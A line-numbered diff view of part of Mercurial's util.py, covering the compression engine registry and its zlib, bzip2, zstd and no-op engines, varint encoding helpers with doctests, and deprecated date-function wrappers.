3402 3635 def supportedbundletypes(self):
3403 3636 return set(self._bundletypes.keys())
3404 3637
3405 3638 def forbundlename(self, bundlename):
3406 3639 """Obtain a compression engine registered to a bundle name.
3407 3640
3408 3641 Will raise KeyError if the bundle type isn't registered.
3409 3642
3410 3643 Will abort if the engine is known but not available.
3411 3644 """
3412 3645 engine = self._engines[self._bundlenames[bundlename]]
3413 3646 if not engine.available():
3414 3647 raise error.Abort(_('compression engine %s could not be loaded') %
3415 3648 engine.name())
3416 3649 return engine
3417 3650
3418 3651 def forbundletype(self, bundletype):
3419 3652 """Obtain a compression engine registered to a bundle type.
3420 3653
3421 3654 Will raise KeyError if the bundle type isn't registered.
3422 3655
3423 3656 Will abort if the engine is known but not available.
3424 3657 """
3425 3658 engine = self._engines[self._bundletypes[bundletype]]
3426 3659 if not engine.available():
3427 3660 raise error.Abort(_('compression engine %s could not be loaded') %
3428 3661 engine.name())
3429 3662 return engine
3430 3663
3431 3664 def supportedwireengines(self, role, onlyavailable=True):
3432 3665 """Obtain compression engines that support the wire protocol.
3433 3666
3434 3667 Returns a list of engines in prioritized order, most desired first.
3435 3668
3436 3669 If ``onlyavailable`` is set, filter out engines that can't be
3437 3670 loaded.
3438 3671 """
3439 3672 assert role in (SERVERROLE, CLIENTROLE)
3440 3673
3441 3674 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3442 3675
3443 3676 engines = [self._engines[e] for e in self._wiretypes.values()]
3444 3677 if onlyavailable:
3445 3678 engines = [e for e in engines if e.available()]
3446 3679
3447 3680 def getkey(e):
3448 3681 # Sort first by priority, highest first. In case of tie, sort
3449 3682 # alphabetically. This is arbitrary, but ensures output is
3450 3683 # stable.
3451 3684 w = e.wireprotosupport()
3452 3685 return -1 * getattr(w, attr), w.name
3453 3686
3454 3687 return list(sorted(engines, key=getkey))
3455 3688
3456 3689 def forwiretype(self, wiretype):
3457 3690 engine = self._engines[self._wiretypes[wiretype]]
3458 3691 if not engine.available():
3459 3692 raise error.Abort(_('compression engine %s could not be loaded') %
3460 3693 engine.name())
3461 3694 return engine
3462 3695
3463 3696 def forrevlogheader(self, header):
3464 3697 """Obtain a compression engine registered to a revlog header.
3465 3698
3466 3699 Will raise KeyError if the revlog header value isn't registered.
3467 3700 """
3468 3701 return self._engines[self._revlogheaders[header]]
3469 3702
3470 3703 compengines = compressormanager()
3471 3704
3472 3705 class compressionengine(object):
3473 3706 """Base class for compression engines.
3474 3707
3475 3708 Compression engines must implement the interface defined by this class.
3476 3709 """
3477 3710 def name(self):
3478 3711 """Returns the name of the compression engine.
3479 3712
3480 3713 This is the key the engine is registered under.
3481 3714
3482 3715 This method must be implemented.
3483 3716 """
3484 3717 raise NotImplementedError()
3485 3718
3486 3719 def available(self):
3487 3720 """Whether the compression engine is available.
3488 3721
3489 3722 The intent of this method is to allow optional compression engines
3490 3723 that may not be available in all installations (such as engines relying
3491 3724 on C extensions that may not be present).
3492 3725 """
3493 3726 return True
3494 3727
3495 3728 def bundletype(self):
3496 3729 """Describes bundle identifiers for this engine.
3497 3730
3498 3731 If this compression engine isn't supported for bundles, returns None.
3499 3732
3500 3733 If this engine can be used for bundles, returns a 2-tuple of strings of
3501 3734 the user-facing "bundle spec" compression name and an internal
3502 3735 identifier used to denote the compression format within bundles. To
3503 3736 exclude the name from external usage, set the first element to ``None``.
3504 3737
3505 3738 If bundle compression is supported, the class must also implement
3506 3739 ``compressstream`` and `decompressorreader``.
3507 3740
3508 3741 The docstring of this method is used in the help system to tell users
3509 3742 about this engine.
3510 3743 """
3511 3744 return None
3512 3745
3513 3746 def wireprotosupport(self):
3514 3747 """Declare support for this compression format on the wire protocol.
3515 3748
3516 3749 If this compression engine isn't supported for compressing wire
3517 3750 protocol payloads, returns None.
3518 3751
3519 3752 Otherwise, returns ``compenginewireprotosupport`` with the following
3520 3753 fields:
3521 3754
3522 3755 * String format identifier
3523 3756 * Integer priority for the server
3524 3757 * Integer priority for the client
3525 3758
3526 3759 The integer priorities are used to order the advertisement of format
3527 3760 support by server and client. The highest integer is advertised
3528 3761 first. Integers with non-positive values aren't advertised.
3529 3762
3530 3763 The priority values are somewhat arbitrary and only used for default
3531 3764 ordering. The relative order can be changed via config options.
3532 3765
3533 3766 If wire protocol compression is supported, the class must also implement
3534 3767 ``compressstream`` and ``decompressorreader``.
3535 3768 """
3536 3769 return None
3537 3770
3538 3771 def revlogheader(self):
3539 3772 """Header added to revlog chunks that identifies this engine.
3540 3773
3541 3774 If this engine can be used to compress revlogs, this method should
3542 3775 return the bytes used to identify chunks compressed with this engine.
3543 3776 Else, the method should return ``None`` to indicate it does not
3544 3777 participate in revlog compression.
3545 3778 """
3546 3779 return None
3547 3780
3548 3781 def compressstream(self, it, opts=None):
3549 3782 """Compress an iterator of chunks.
3550 3783
3551 3784 The method receives an iterator (ideally a generator) of chunks of
3552 3785 bytes to be compressed. It returns an iterator (ideally a generator)
3553 3786 of bytes of chunks representing the compressed output.
3554 3787
3555 3788 Optionally accepts an argument defining how to perform compression.
3556 3789 Each engine treats this argument differently.
3557 3790 """
3558 3791 raise NotImplementedError()
3559 3792
3560 3793 def decompressorreader(self, fh):
3561 3794 """Perform decompression on a file object.
3562 3795
3563 3796 Argument is an object with a ``read(size)`` method that returns
3564 3797 compressed data. Return value is an object with a ``read(size)`` that
3565 3798 returns uncompressed data.
3566 3799 """
3567 3800 raise NotImplementedError()
3568 3801
3569 3802 def revlogcompressor(self, opts=None):
3570 3803 """Obtain an object that can be used to compress revlog entries.
3571 3804
3572 3805 The object has a ``compress(data)`` method that compresses binary
3573 3806 data. This method returns compressed binary data or ``None`` if
3574 3807 the data could not be compressed (too small, not compressible, etc).
3575 3808 The returned data should have a header uniquely identifying this
3576 3809 compression format so decompression can be routed to this engine.
3577 3810 This header should be identified by the ``revlogheader()`` return
3578 3811 value.
3579 3812
3580 3813 The object has a ``decompress(data)`` method that decompresses
3581 3814 data. The method will only be called if ``data`` begins with
3582 3815 ``revlogheader()``. The method should return the raw, uncompressed
3583 3816 data or raise a ``RevlogError``.
3584 3817
3585 3818 The object is reusable but is not thread safe.
3586 3819 """
3587 3820 raise NotImplementedError()
3588 3821
3589 3822 class _zlibengine(compressionengine):
3590 3823 def name(self):
3591 3824 return 'zlib'
3592 3825
3593 3826 def bundletype(self):
3594 3827 """zlib compression using the DEFLATE algorithm.
3595 3828
3596 3829 All Mercurial clients should support this format. The compression
3597 3830 algorithm strikes a reasonable balance between compression ratio
3598 3831 and size.
3599 3832 """
3600 3833 return 'gzip', 'GZ'
3601 3834
3602 3835 def wireprotosupport(self):
3603 3836 return compewireprotosupport('zlib', 20, 20)
3604 3837
3605 3838 def revlogheader(self):
3606 3839 return 'x'
3607 3840
3608 3841 def compressstream(self, it, opts=None):
3609 3842 opts = opts or {}
3610 3843
3611 3844 z = zlib.compressobj(opts.get('level', -1))
3612 3845 for chunk in it:
3613 3846 data = z.compress(chunk)
3614 3847 # Not all calls to compress emit data. It is cheaper to inspect
3615 3848 # here than to feed empty chunks through generator.
3616 3849 if data:
3617 3850 yield data
3618 3851
3619 3852 yield z.flush()
3620 3853
3621 3854 def decompressorreader(self, fh):
3622 3855 def gen():
3623 3856 d = zlib.decompressobj()
3624 3857 for chunk in filechunkiter(fh):
3625 3858 while chunk:
3626 3859 # Limit output size to limit memory.
3627 3860 yield d.decompress(chunk, 2 ** 18)
3628 3861 chunk = d.unconsumed_tail
3629 3862
3630 3863 return chunkbuffer(gen())
3631 3864
3632 3865 class zlibrevlogcompressor(object):
3633 3866 def compress(self, data):
3634 3867 insize = len(data)
3635 3868 # Caller handles empty input case.
3636 3869 assert insize > 0
3637 3870
3638 3871 if insize < 44:
3639 3872 return None
3640 3873
3641 3874 elif insize <= 1000000:
3642 3875 compressed = zlib.compress(data)
3643 3876 if len(compressed) < insize:
3644 3877 return compressed
3645 3878 return None
3646 3879
3647 3880 # zlib makes an internal copy of the input buffer, doubling
3648 3881 # memory usage for large inputs. So do streaming compression
3649 3882 # on large inputs.
3650 3883 else:
3651 3884 z = zlib.compressobj()
3652 3885 parts = []
3653 3886 pos = 0
3654 3887 while pos < insize:
3655 3888 pos2 = pos + 2**20
3656 3889 parts.append(z.compress(data[pos:pos2]))
3657 3890 pos = pos2
3658 3891 parts.append(z.flush())
3659 3892
3660 3893 if sum(map(len, parts)) < insize:
3661 3894 return ''.join(parts)
3662 3895 return None
3663 3896
3664 3897 def decompress(self, data):
3665 3898 try:
3666 3899 return zlib.decompress(data)
3667 3900 except zlib.error as e:
3668 3901 raise error.RevlogError(_('revlog decompress error: %s') %
3669 3902 forcebytestr(e))
3670 3903
3671 3904 def revlogcompressor(self, opts=None):
3672 3905 return self.zlibrevlogcompressor()
3673 3906
3674 3907 compengines.register(_zlibengine())
3675 3908
3676 3909 class _bz2engine(compressionengine):
3677 3910 def name(self):
3678 3911 return 'bz2'
3679 3912
3680 3913 def bundletype(self):
3681 3914 """An algorithm that produces smaller bundles than ``gzip``.
3682 3915
3683 3916 All Mercurial clients should support this format.
3684 3917
3685 3918 This engine will likely produce smaller bundles than ``gzip`` but
3686 3919 will be significantly slower, both during compression and
3687 3920 decompression.
3688 3921
3689 3922 If available, the ``zstd`` engine can yield similar or better
3690 3923 compression at much higher speeds.
3691 3924 """
3692 3925 return 'bzip2', 'BZ'
3693 3926
3694 3927 # We declare a protocol name but don't advertise by default because
3695 3928 # it is slow.
3696 3929 def wireprotosupport(self):
3697 3930 return compewireprotosupport('bzip2', 0, 0)
3698 3931
3699 3932 def compressstream(self, it, opts=None):
3700 3933 opts = opts or {}
3701 3934 z = bz2.BZ2Compressor(opts.get('level', 9))
3702 3935 for chunk in it:
3703 3936 data = z.compress(chunk)
3704 3937 if data:
3705 3938 yield data
3706 3939
3707 3940 yield z.flush()
3708 3941
3709 3942 def decompressorreader(self, fh):
3710 3943 def gen():
3711 3944 d = bz2.BZ2Decompressor()
3712 3945 for chunk in filechunkiter(fh):
3713 3946 yield d.decompress(chunk)
3714 3947
3715 3948 return chunkbuffer(gen())
3716 3949
3717 3950 compengines.register(_bz2engine())
3718 3951
3719 3952 class _truncatedbz2engine(compressionengine):
3720 3953 def name(self):
3721 3954 return 'bz2truncated'
3722 3955
3723 3956 def bundletype(self):
3724 3957 return None, '_truncatedBZ'
3725 3958
3726 3959 # We don't implement compressstream because it is hackily handled elsewhere.
3727 3960
3728 3961 def decompressorreader(self, fh):
3729 3962 def gen():
3730 3963 # The input stream doesn't have the 'BZ' header. So add it back.
3731 3964 d = bz2.BZ2Decompressor()
3732 3965 d.decompress('BZ')
3733 3966 for chunk in filechunkiter(fh):
3734 3967 yield d.decompress(chunk)
3735 3968
3736 3969 return chunkbuffer(gen())
3737 3970
3738 3971 compengines.register(_truncatedbz2engine())
3739 3972
3740 3973 class _noopengine(compressionengine):
3741 3974 def name(self):
3742 3975 return 'none'
3743 3976
3744 3977 def bundletype(self):
3745 3978 """No compression is performed.
3746 3979
3747 3980 Use this compression engine to explicitly disable compression.
3748 3981 """
3749 3982 return 'none', 'UN'
3750 3983
3751 3984 # Clients always support uncompressed payloads. Servers don't because
3752 3985 # unless you are on a fast network, uncompressed payloads can easily
3753 3986 # saturate your network pipe.
3754 3987 def wireprotosupport(self):
3755 3988 return compewireprotosupport('none', 0, 10)
3756 3989
3757 3990 # We don't implement revlogheader because it is handled specially
3758 3991 # in the revlog class.
3759 3992
3760 3993 def compressstream(self, it, opts=None):
3761 3994 return it
3762 3995
3763 3996 def decompressorreader(self, fh):
3764 3997 return fh
3765 3998
3766 3999 class nooprevlogcompressor(object):
3767 4000 def compress(self, data):
3768 4001 return None
3769 4002
3770 4003 def revlogcompressor(self, opts=None):
3771 4004 return self.nooprevlogcompressor()
3772 4005
3773 4006 compengines.register(_noopengine())
3774 4007
3775 4008 class _zstdengine(compressionengine):
3776 4009 def name(self):
3777 4010 return 'zstd'
3778 4011
3779 4012 @propertycache
3780 4013 def _module(self):
3781 4014 # Not all installs have the zstd module available. So defer importing
3782 4015 # until first access.
3783 4016 try:
3784 4017 from . import zstd
3785 4018 # Force delayed import.
3786 4019 zstd.__version__
3787 4020 return zstd
3788 4021 except ImportError:
3789 4022 return None
3790 4023
3791 4024 def available(self):
3792 4025 return bool(self._module)
3793 4026
3794 4027 def bundletype(self):
3795 4028 """A modern compression algorithm that is fast and highly flexible.
3796 4029
3797 4030 Only supported by Mercurial 4.1 and newer clients.
3798 4031
3799 4032 With the default settings, zstd compression is both faster and yields
3800 4033 better compression than ``gzip``. It also frequently yields better
3801 4034 compression than ``bzip2`` while operating at much higher speeds.
3802 4035
3803 4036 If this engine is available and backwards compatibility is not a
3804 4037 concern, it is likely the best available engine.
3805 4038 """
3806 4039 return 'zstd', 'ZS'
3807 4040
3808 4041 def wireprotosupport(self):
3809 4042 return compewireprotosupport('zstd', 50, 50)
3810 4043
3811 4044 def revlogheader(self):
3812 4045 return '\x28'
3813 4046
3814 4047 def compressstream(self, it, opts=None):
3815 4048 opts = opts or {}
3816 4049 # zstd level 3 is almost always significantly faster than zlib
3817 4050 # while providing no worse compression. It strikes a good balance
3818 4051 # between speed and compression.
3819 4052 level = opts.get('level', 3)
3820 4053
3821 4054 zstd = self._module
3822 4055 z = zstd.ZstdCompressor(level=level).compressobj()
3823 4056 for chunk in it:
3824 4057 data = z.compress(chunk)
3825 4058 if data:
3826 4059 yield data
3827 4060
3828 4061 yield z.flush()
3829 4062
3830 4063 def decompressorreader(self, fh):
3831 4064 zstd = self._module
3832 4065 dctx = zstd.ZstdDecompressor()
3833 4066 return chunkbuffer(dctx.read_from(fh))
3834 4067
3835 4068 class zstdrevlogcompressor(object):
3836 4069 def __init__(self, zstd, level=3):
3837 4070 # Writing the content size adds a few bytes to the output. However,
3838 4071 # it allows decompression to be more optimal since we can
3839 4072 # pre-allocate a buffer to hold the result.
3840 4073 self._cctx = zstd.ZstdCompressor(level=level,
3841 4074 write_content_size=True)
3842 4075 self._dctx = zstd.ZstdDecompressor()
3843 4076 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3844 4077 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3845 4078
3846 4079 def compress(self, data):
3847 4080 insize = len(data)
3848 4081 # Caller handles empty input case.
3849 4082 assert insize > 0
3850 4083
3851 4084 if insize < 50:
3852 4085 return None
3853 4086
3854 4087 elif insize <= 1000000:
3855 4088 compressed = self._cctx.compress(data)
3856 4089 if len(compressed) < insize:
3857 4090 return compressed
3858 4091 return None
3859 4092 else:
3860 4093 z = self._cctx.compressobj()
3861 4094 chunks = []
3862 4095 pos = 0
3863 4096 while pos < insize:
3864 4097 pos2 = pos + self._compinsize
3865 4098 chunk = z.compress(data[pos:pos2])
3866 4099 if chunk:
3867 4100 chunks.append(chunk)
3868 4101 pos = pos2
3869 4102 chunks.append(z.flush())
3870 4103
3871 4104 if sum(map(len, chunks)) < insize:
3872 4105 return ''.join(chunks)
3873 4106 return None
3874 4107
3875 4108 def decompress(self, data):
3876 4109 insize = len(data)
3877 4110
3878 4111 try:
3879 4112 # This was measured to be faster than other streaming
3880 4113 # decompressors.
3881 4114 dobj = self._dctx.decompressobj()
3882 4115 chunks = []
3883 4116 pos = 0
3884 4117 while pos < insize:
3885 4118 pos2 = pos + self._decompinsize
3886 4119 chunk = dobj.decompress(data[pos:pos2])
3887 4120 if chunk:
3888 4121 chunks.append(chunk)
3889 4122 pos = pos2
3890 4123 # Frame should be exhausted, so no finish() API.
3891 4124
3892 4125 return ''.join(chunks)
3893 4126 except Exception as e:
3894 4127 raise error.RevlogError(_('revlog decompress error: %s') %
3895 4128 forcebytestr(e))
3896 4129
3897 4130 def revlogcompressor(self, opts=None):
3898 4131 opts = opts or {}
3899 4132 return self.zstdrevlogcompressor(self._module,
3900 4133 level=opts.get('level', 3))
3901 4134
3902 4135 compengines.register(_zstdengine())
3903 4136
3904 4137 def bundlecompressiontopics():
3905 4138 """Obtains a list of available bundle compressions for use in help."""
3906 4139 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3907 4140 items = {}
3908 4141
3909 4142 # We need to format the docstring. So use a dummy object/type to hold it
3910 4143 # rather than mutating the original.
3911 4144 class docobject(object):
3912 4145 pass
3913 4146
3914 4147 for name in compengines:
3915 4148 engine = compengines[name]
3916 4149
3917 4150 if not engine.available():
3918 4151 continue
3919 4152
3920 4153 bt = engine.bundletype()
3921 4154 if not bt or not bt[0]:
3922 4155 continue
3923 4156
3924 4157 doc = pycompat.sysstr('``%s``\n %s') % (
3925 4158 bt[0], engine.bundletype.__doc__)
3926 4159
3927 4160 value = docobject()
3928 4161 value.__doc__ = doc
3929 4162 value._origdoc = engine.bundletype.__doc__
3930 4163 value._origfunc = engine.bundletype
3931 4164
3932 4165 items[bt[0]] = value
3933 4166
3934 4167 return items
3935 4168
3936 4169 i18nfunctions = bundlecompressiontopics().values()
3937 4170
3938 4171 # convenient shortcut
3939 4172 dst = debugstacktrace
3940 4173
3941 4174 def safename(f, tag, ctx, others=None):
3942 4175 """
3943 4176 Generate a name that it is safe to rename f to in the given context.
3944 4177
3945 4178 f: filename to rename
3946 4179 tag: a string tag that will be included in the new name
3947 4180 ctx: a context, in which the new name must not exist
3948 4181 others: a set of other filenames that the new name must not be in
3949 4182
3950 4183 Returns a file name of the form oldname~tag[~number] which does not exist
3951 4184 in the provided context and is not in the set of other names.
3952 4185 """
3953 4186 if others is None:
3954 4187 others = set()
3955 4188
3956 4189 fn = '%s~%s' % (f, tag)
3957 4190 if fn not in ctx and fn not in others:
3958 4191 return fn
3959 4192 for n in itertools.count(1):
3960 4193 fn = '%s~%s~%s' % (f, tag, n)
3961 4194 if fn not in ctx and fn not in others:
3962 4195 return fn
3963 4196
3964 4197 def readexactly(stream, n):
3965 4198 '''read n bytes from stream.read and abort if less was available'''
3966 4199 s = stream.read(n)
3967 4200 if len(s) < n:
3968 4201 raise error.Abort(_("stream ended unexpectedly"
3969 4202 " (got %d bytes, expected %d)")
3970 4203 % (len(s), n))
3971 4204 return s
3972 4205
3973 4206 def uvarintencode(value):
3974 4207 """Encode an unsigned integer value to a varint.
3975 4208
3976 4209 A varint is a variable length integer of 1 or more bytes. Each byte
3977 4210 except the last has the most significant bit set. The lower 7 bits of
3978 4211 each byte store the 2's complement representation, least significant group
3979 4212 first.
3980 4213
3981 4214 >>> uvarintencode(0)
3982 4215 '\\x00'
3983 4216 >>> uvarintencode(1)
3984 4217 '\\x01'
3985 4218 >>> uvarintencode(127)
3986 4219 '\\x7f'
3987 4220 >>> uvarintencode(1337)
3988 4221 '\\xb9\\n'
3989 4222 >>> uvarintencode(65536)
3990 4223 '\\x80\\x80\\x04'
3991 4224 >>> uvarintencode(-1)
3992 4225 Traceback (most recent call last):
3993 4226 ...
3994 4227 ProgrammingError: negative value for uvarint: -1
3995 4228 """
3996 4229 if value < 0:
3997 4230 raise error.ProgrammingError('negative value for uvarint: %d'
3998 4231 % value)
3999 4232 bits = value & 0x7f
4000 4233 value >>= 7
4001 4234 bytes = []
4002 4235 while value:
4003 4236 bytes.append(pycompat.bytechr(0x80 | bits))
4004 4237 bits = value & 0x7f
4005 4238 value >>= 7
4006 4239 bytes.append(pycompat.bytechr(bits))
4007 4240
4008 4241 return ''.join(bytes)
4009 4242
4010 4243 def uvarintdecodestream(fh):
4011 4244 """Decode an unsigned variable length integer from a stream.
4012 4245
4013 4246 The passed argument is anything that has a ``.read(N)`` method.
4014 4247
4015 4248 >>> try:
4016 4249 ... from StringIO import StringIO as BytesIO
4017 4250 ... except ImportError:
4018 4251 ... from io import BytesIO
4019 4252 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4020 4253 0
4021 4254 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4022 4255 1
4023 4256 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4024 4257 127
4025 4258 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4026 4259 1337
4027 4260 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4028 4261 65536
4029 4262 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4030 4263 Traceback (most recent call last):
4031 4264 ...
4032 4265 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4033 4266 """
4034 4267 result = 0
4035 4268 shift = 0
4036 4269 while True:
4037 4270 byte = ord(readexactly(fh, 1))
4038 4271 result |= ((byte & 0x7f) << shift)
4039 4272 if not (byte & 0x80):
4040 4273 return result
4041 4274 shift += 7
4042 4275
4043 4276 ###
4044 4277 # Deprecation warnings for util.py splitting
4045 4278 ###
4046 4279
4047 4280 defaultdateformats = dateutil.defaultdateformats
4048 4281
4049 4282 extendeddateformats = dateutil.extendeddateformats
4050 4283
4051 4284 def makedate(*args, **kwargs):
4052 4285 msg = ("'util.makedate' is deprecated, "
4053 4286 "use 'utils.dateutil.makedate'")
4054 4287 nouideprecwarn(msg, "4.6")
4055 4288 return dateutil.makedate(*args, **kwargs)
4056 4289
4057 4290 def datestr(*args, **kwargs):
4058 4291 msg = ("'util.datestr' is deprecated, "
4059 4292 "use 'utils.dateutil.datestr'")
4060 4293 nouideprecwarn(msg, "4.6")
4061 4294 return dateutil.datestr(*args, **kwargs)
4062 4295
4063 4296 def shortdate(*args, **kwargs):
4064 4297 msg = ("'util.shortdate' is deprecated, "
4065 4298 "use 'utils.dateutil.shortdate'")
4066 4299 nouideprecwarn(msg, "4.6")
4067 4300 return dateutil.shortdate(*args, **kwargs)
4068 4301
4069 4302 def parsetimezone(*args, **kwargs):
4070 4303 msg = ("'util.parsetimezone' is deprecated, "
4071 4304 "use 'utils.dateutil.parsetimezone'")
4072 4305 nouideprecwarn(msg, "4.6")
4073 4306 return dateutil.parsetimezone(*args, **kwargs)
4074 4307
4075 4308 def strdate(*args, **kwargs):
4076 4309 msg = ("'util.strdate' is deprecated, "
4077 4310 "use 'utils.dateutil.strdate'")
4078 4311 nouideprecwarn(msg, "4.6")
4079 4312 return dateutil.strdate(*args, **kwargs)
4080 4313
4081 4314 def parsedate(*args, **kwargs):
4082 4315 msg = ("'util.parsedate' is deprecated, "
4083 4316 "use 'utils.dateutil.parsedate'")
4084 4317 nouideprecwarn(msg, "4.6")
4085 4318 return dateutil.parsedate(*args, **kwargs)
4086 4319
4087 4320 def matchdate(*args, **kwargs):
4088 4321 msg = ("'util.matchdate' is deprecated, "
4089 4322 "use 'utils.dateutil.matchdate'")
4090 4323 nouideprecwarn(msg, "4.6")
4091 4324 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now